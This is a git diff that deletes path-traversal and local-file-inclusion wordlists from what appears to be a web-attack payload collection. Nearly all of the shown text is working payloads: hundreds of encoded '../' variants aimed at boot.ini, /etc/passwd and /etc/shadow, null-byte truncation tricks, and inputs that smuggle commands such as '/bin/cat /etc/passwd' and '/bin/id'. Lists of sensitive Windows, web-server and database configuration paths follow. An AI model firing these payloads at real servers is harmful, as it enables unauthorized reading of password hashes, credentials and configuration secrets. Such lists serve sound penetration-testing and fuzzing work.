-/0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\boot.ini -/0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\boot.ini -/0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\boot.ini -/0x2e0x2e0x5cboot.ini -/0x2e0x2e0x5c0x2e0x2e0x5cboot.ini -/0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cboot.ini -/0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cboot.ini -/0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cboot.ini -/0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cboot.ini -/0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cboot.ini -/0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cboot.ini -/..%c0%2fboot.ini -/..%c0%2f..%c0%2fboot.ini -/..%c0%2f..%c0%2f..%c0%2fboot.ini -/..%c0%2f..%c0%2f..%c0%2f..%c0%2fboot.ini -/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fboot.ini -/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fboot.ini -/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fboot.ini -/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fboot.ini -/%c0%2e%c0%2e/boot.ini -/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini -/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini -/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini -/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini -/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini -/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini -/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini -/%c0%2e%c0%2e%c0%2fboot.ini -/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fboot.ini -/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fboot.ini -/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fboot.ini -/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fboot.ini -/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fboot.ini -/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fboot.ini -/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fboot.ini -/..%c0%5cboot.ini -/..%c0%5c..%c0%5cboot.ini -/..%c0%5c..%c0%5c..%c0%5cboot.ini -/..%c0%5c..%c0%5c..%c0%5c..%c0%5cboot.ini -/..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5cboot.ini -/..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5cboot.ini -/..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5cboot.ini -/..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5cboot.ini -/%c0%2e%c0%2e\boot.ini -/%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini -/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini -/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini -/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini -/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini -/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini -/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini -/%c0%2e%c0%2e%c0%5cboot.ini -/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini -/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini -/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini -/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini -/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini -/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini -/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini -////%2e%2e%2fboot.ini -////%2e%2e%2f%2e%2e%2fboot.ini -////%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -/\\\%2e%2e%5cboot.ini -/\\\%2e%2e%5c%2e%2e%5cboot.ini -/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -/..//boot.ini -/..//..//boot.ini -/..//..//..//boot.ini -/..//..//..//..//boot.ini -/..//..//..//..//..//boot.ini -/..//..//..//..//..//..//boot.ini -/..//..//..//..//..//..//..//boot.ini -/..//..//..//..//..//..//..//..//boot.ini -/..///boot.ini -/..///..///boot.ini -/..///..///..///boot.ini -/..///..///..///..///boot.ini -/..///..///..///..///..///boot.ini -/..///..///..///..///..///..///boot.ini -/..///..///..///..///..///..///..///boot.ini -/..///..///..///..///..///..///..///..///boot.ini -/..\\boot.ini -/..\\..\\boot.ini -/..\\..\\..\\boot.ini -/..\\..\\..\\..\\boot.ini -/..\\..\\..\\..\\..\\boot.ini -/..\\..\\..\\..\\..\\..\\boot.ini -/..\\..\\..\\..\\..\\..\\..\\boot.ini -/..\\..\\..\\..\\..\\..\\..\\..\\boot.ini -/..\\\boot.ini -/..\\\..\\\boot.ini -/..\\\..\\\..\\\boot.ini -/..\\\..\\\..\\\..\\\boot.ini -/..\\\..\\\..\\\..\\\..\\\boot.ini -/..\\\..\\\..\\\..\\\..\\\..\\\boot.ini -/..\\\..\\\..\\\..\\\..\\\..\\\..\\\boot.ini -/..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\boot.ini -/./\/./boot.ini -/./\/././\/./boot.ini -/./\/././\/././\/./boot.ini -/./\/././\/././\/././\/./boot.ini -/./\/././\/././\/././\/././\/./boot.ini -/./\/././\/././\/././\/././\/././\/./boot.ini -/./\/././\/././\/././\/././\/././\/././\/./boot.ini -/./\/././\/././\/././\/././\/././\/././\/././\/./boot.ini -/.\/\.\boot.ini -/.\/\.\.\/\.\boot.ini -/.\/\.\.\/\.\.\/\.\boot.ini -/.\/\.\.\/\.\.\/\.\.\/\.\boot.ini -/.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\boot.ini -/.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\boot.ini -/.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\boot.ini -/.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\boot.ini -/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../boot.ini -/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../boot.ini -/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../boot.ini -/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../boot.ini -/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../boot.ini -/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../boot.ini -/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../boot.ini -/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../boot.ini -/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\boot.ini -/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\boot.ini -/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\boot.ini -/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\boot.ini -/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\boot.ini -/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\boot.ini -/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\boot.ini -/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\boot.ini -/./../boot.ini -/./.././../boot.ini -/./.././.././../boot.ini -/./.././.././.././../boot.ini -/./.././.././.././.././../boot.ini -/./.././.././.././.././.././../boot.ini -/./.././.././.././.././.././.././../boot.ini -/./.././.././.././.././.././.././.././../boot.ini -/.\..\boot.ini -/.\..\.\..\boot.ini -/.\..\.\..\.\..\boot.ini -/.\..\.\..\.\..\.\..\boot.ini -/.\..\.\..\.\..\.\..\.\..\boot.ini -/.\..\.\..\.\..\.\..\.\..\.\..\boot.ini -/.\..\.\..\.\..\.\..\.\..\.\..\.\..\boot.ini -/.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\boot.ini -/.//..//boot.ini -/.//..//.//..//boot.ini -/.//..//.//..//.//..//boot.ini -/.//..//.//..//.//..//.//..//boot.ini -/.//..//.//..//.//..//.//..//.//..//boot.ini -/.//..//.//..//.//..//.//..//.//..//.//..//boot.ini -/.//..//.//..//.//..//.//..//.//..//.//..//.//..//boot.ini -/.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//boot.ini -/.\\..\\boot.ini -/.\\..\\.\\..\\boot.ini -/.\\..\\.\\..\\.\\..\\boot.ini -/.\\..\\.\\..\\.\\..\\.\\..\\boot.ini -/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\boot.ini -/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\boot.ini -/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\boot.ini -/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\boot.ini -/../boot.ini -/../..//boot.ini -/../..//../boot.ini -/../..//../..//boot.ini -/../..//../..//../boot.ini -/../..//../..//../..//boot.ini -/../..//../..//../..//../boot.ini -/../..//../..//../..//../..//boot.ini -/..\boot.ini -/..\..\\boot.ini -/..\..\\..\boot.ini -/..\..\\..\..\\boot.ini -/..\..\\..\..\\..\boot.ini -/..\..\\..\..\\..\..\\boot.ini -/..\..\\..\..\\..\..\\..\boot.ini -/..\..\\..\..\\..\..\\..\..\\boot.ini -/..///boot.ini -/../..///boot.ini -/../..//..///boot.ini -/../..//../..///boot.ini -/../..//../..//..///boot.ini -/../..//../..//../..///boot.ini -/../..//../..//../..//..///boot.ini -/../..//../..//../..//../..///boot.ini -/..\\\boot.ini -/..\..\\\boot.ini -/..\..\\..\\\boot.ini -/..\..\\..\..\\\boot.ini -/..\..\\..\..\\..\\\boot.ini -/..\..\\..\..\\..\..\\\boot.ini -/..\..\\..\..\\..\..\\..\\\boot.ini -/..\..\\..\..\\..\..\\..\..\\\boot.ini -C:\WINDOWS\win.ini../../../../../../../../../../../../etc/hosts%00 -../../../../../../../../../../../../etc/hosts -../../boot.ini -/../../../../../../../../%2A -../../../../../../../../../../../../etc/passwd%00 -../../../../../../../../../../../../etc/passwd -../../../../../../../../../../../../etc/shadow%00 -../../../../../../../../../../../../etc/shadow -/../../../../../../../../../../etc/passwd^^ -/../../../../../../../../../../etc/shadow^^ -/../../../../../../../../../../etc/passwd -/../../../../../../../../../../etc/shadow -/./././././././././././etc/passwd -/./././././././././././etc/shadow -\..\..\..\..\..\..\..\..\..\..\etc\passwd -\..\..\..\..\..\..\..\..\..\..\etc\shadow -..\..\..\..\..\..\..\..\..\..\etc\passwd -..\..\..\..\..\..\..\..\..\..\etc\shadow -/..\../..\../..\../..\../..\../..\../etc/passwd -/..\../..\../..\../..\../..\../..\../etc/shadow -.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd -.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow -\..\..\..\..\..\..\..\..\..\..\etc\passwd%00 -\..\..\..\..\..\..\..\..\..\..\etc\shadow%00 -..\..\..\..\..\..\..\..\..\..\etc\passwd%00 -..\..\..\..\..\..\..\..\..\..\etc\shadow%00 -%0a/bin/cat%20/etc/passwd -%0a/bin/cat%20/etc/shadow -%00/etc/passwd%00 -%00/etc/shadow%00 -%00../../../../../../etc/passwd -%00../../../../../../etc/shadow -/../../../../../../../../../../../etc/passwd%00.jpg -/../../../../../../../../../../../etc/passwd%00.html -/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd -/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow -%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 -/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 -%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00 -%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini -/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini -\\'/bin/cat%20/etc/passwd\\' -\\'/bin/cat%20/etc/shadow\\' -../../../../../../../../conf/server.xml -/../../../../../../../../bin/id| -C:/inetpub/wwwroot/global.asa -C:\inetpub\wwwroot\global.asa -C:/boot.ini -C:\boot.ini -../../../../../../../../../../../../localstart.asp%00 -../../../../../../../../../../../../localstart.asp -../../../../../../../../../../../../boot.ini%00 -../../../../../../../../../../../../boot.ini -/./././././././././././boot.ini -/../../../../../../../../../../../boot.ini%00 -/../../../../../../../../../../../boot.ini -/..\../..\../..\../..\../..\../..\../boot.ini -/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini -\..\..\..\..\..\..\..\..\..\..\boot.ini -..\..\..\..\..\..\..\..\..\..\boot.ini%00 -..\..\..\..\..\..\..\..\..\..\boot.ini -/../../../../../../../../../../../boot.ini%00.html -/../../../../../../../../../../../boot.ini%00.jpg -/.../.../.../.../.../ -..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -/..././..././..././..././..././..././..././..././boot.ini -/..././..././..././..././..././..././..././..././boot.ini%00 -/..././..././..././..././..././..././..././..././etc/passwd -/..././..././..././..././..././..././..././..././etc/passwd%00 diff --git a/File Inclusion/Intruders/Web-files.txt b/File Inclusion/Intruders/Web-files.txt deleted file mode 100644 index c9736e7..0000000 --- a/File Inclusion/Intruders/Web-files.txt +++ /dev/null @@ -1,14 +0,0 @@ -/robots.txt -/humans.txt -/style.css -/configuration.php -wp-login.php -wp-admin.php -/wp-content/plugins -/include/config.php -/inc/config.php -/include/mysql.php -/inc/mysql.php -/sites/defaults/settings.php -/phpmyadmin/changelog.php -web.config \ No newline at end of file diff --git a/File Inclusion/Intruders/Windows-files.txt b/File Inclusion/Intruders/Windows-files.txt deleted file mode 100644 index 63386f7..0000000 --- a/File Inclusion/Intruders/Windows-files.txt +++ /dev/null @@ -1,212 +0,0 @@ -C:/$recycle.bin/s-1-5-18/desktop.ini -C:/apache2/log/access.log -C:/apache2/log/access_log -C:/apache2/log/error.log -C:/apache2/log/error_log -C:/apache2/logs/access.log -C:/apache2/logs/access_log -C:/apache2/logs/error.log -C:/apache2/logs/error_log -C:/apache/log/access.log -C:/apache/log/access_log -C:/apache/log/error.log -C:/apache/log/error_log -C:/apache/logs/access.log -C:/apache/logs/access_log -C:\apache\logs\access.log -C:/apache/logs/error.log -C:/apache/logs/error_log -C:\apache\logs\error.log -C:/apache/php/php.ini -C:/boot.ini -C:\boot.ini -C:/documents and settings/administrator/desktop/desktop.ini -C:/documents and settings/administrator/ntuser.dat -C:/documents and settings/administrator/ntuser.ini -C:/home2/bin/stable/apache/php.ini -C:/home/bin/stable/apache/php.ini -C:/inetpub/logs/logfiles -C:/inetpub/wwwroot/global.asa -C:/inetpub/wwwroot/index.asp -C:/inetpub/wwwroot/web.config -C:/log/access.log -C:/log/access_log -C:/log/error.log -C:/log/error_log -C:/log/httpd/access_log -C:/log/httpd/error_log -C:/logs/access.log -C:/logs/access_log -C:/logs/error.log -C:/logs/error_log -C:/logs/httpd/access_log -C:/logs/httpd/error_log -C:/MININT/SMSOSD/OSDLOGS/VARIABLES.DAT -C:/mysql/bin/my.ini -C:/mysql/data/hostname.err -C:/mysql/data/mysql.err -C:/mysql/data/mysql.log -C:/mysql/my.cnf -C:/mysql/my.ini -C:\nginx-1.7.4\conf\nginx.conf -C:\nginx-1.7.4\nginx.conf -C:/opt/xampp/logs/access.log -C:/opt/xampp/logs/access_log -C:/opt/xampp/logs/error.log -C:/opt/xampp/logs/error_log -C:/php4/php.ini -C:/php4/sessions/ -C:/php5/php.ini -C:/php5/sessions/ -C:/php/php.ini -C:/php/sessions/ -C:/program files/apache group/apache2/conf/httpd.conf -C:/program files/apachegroup/apache2/conf/httpd.conf -C:/programfiles/apachegroup/apache2/conf/httpd.conf -C:/program files/apache group/apache/conf/httpd.conf -C:/program files/apachegroup/apache/conf/httpd.conf -C:/programfiles/apachegroup/apache/conf/httpd.conf -C:/program files/apache group/apache/logs/access.log -C:/program files/apache group/apache/logs/error.log -C:\Program Files\Apache Software Foundation\Apache2.2\conf\httpd.conf -C:\Program Files\Apache Software Foundation\Apache2.2\logs\access.log -C:\Program Files\Apache Software Foundation\Apache2.2\logs\error.log -C:/program files/filezilla server/filezilla server.xml -C:/program files/mysql/data/hostname.err -C:/program files/mysql/data/mysql-bin.log -C:/program files/mysql/data/mysql.err -C:/program files/mysql/data/mysql.log -C:/program files/mysql/my.cnf -C:/program files/mysql/my.ini -C:/program files/mysql/mysql server 5.0/data/hostname.err -C:/program files/mysql/mysql server 5.0/data/mysql-bin.log -C:/program files/mysql/mysql server 5.0/data/mysql.err -C:/program files/mysql/mysql server 5.0/data/mysql.log -C:/program files/mysql/mysql server 5.0/my.cnf -C:/program files/mysql/mysql server 5.0/my.ini -C:/program files/mysql/mysql server 5.1/my.ini -C:/program files (x86)/apache group/apache2/conf/httpd.conf -C:/program files (x86)/apache group/apache/conf/access.log -C:/program files (x86)/apache group/apache/conf/error.log -C:/program files (x86)/apache group/apache/conf/httpd.conf -C:/program files (x86)/filezilla server/filezilla server.xml -C:/program files (x86)/xampp/apache/conf/httpd.conf -C:/program files/xampp/apache/conf/httpd.conf -C:/programfiles/xampp/apache/conf/httpd.conf -C:/program files/xampp/apache/conf/httpd.confetc/passwd -C:/sysprep.inf -C:/sysprep/sysprep.inf -C:/sysprep/sysprep.xml -C:/sysprep.xml -C:/system32/inetsrv/metabase.xml -C:/system volume information/wpsettings.dat -C:/unattended.txt -C:/unattended.xml -C:/unattend.txt -C:/unattend.xml -C:/users/administrator/desktop/desktop.ini -C:/users/administrator/ntuser.dat -C:/users/administrator/ntuser.ini -C:\wamp\apache2\logs\access.log -C:\wamp\apache2\logs\access_log -C:\wamp\apache2\logs\error.log -C:\wamp\apache2\logs\error_log -C:\wamp\logs\access.log -C:\wamp\logs\access_log -C:\wamp\logs\error.log -C:\wamp\logs\error_log -C:/windows/csc/v2.0.6/pq -C:/windows/csc/v2.0.6/sm -C:/windows/debug/netsetup.log -C:/windows/explorer.exe -C:/windows/iis6.log -C:/windows/iis6.log (5,6 or 7) -C:/windows/iis7.log -C:/windows/iis8.log -C:/windows/notepad.exe -C:/windows/panther/setupinfo -C:/windows/panther/setupinfo.bak -C:/windows/panther/sysprep.inf -C:/windows/panther/sysprep.xml -C:/windows/panther/unattended.txt -C:/windows/panther/unattended.xml -C:/windows/panther/unattend/setupinfo -C:/windows/panther/unattend/setupinfo.bak 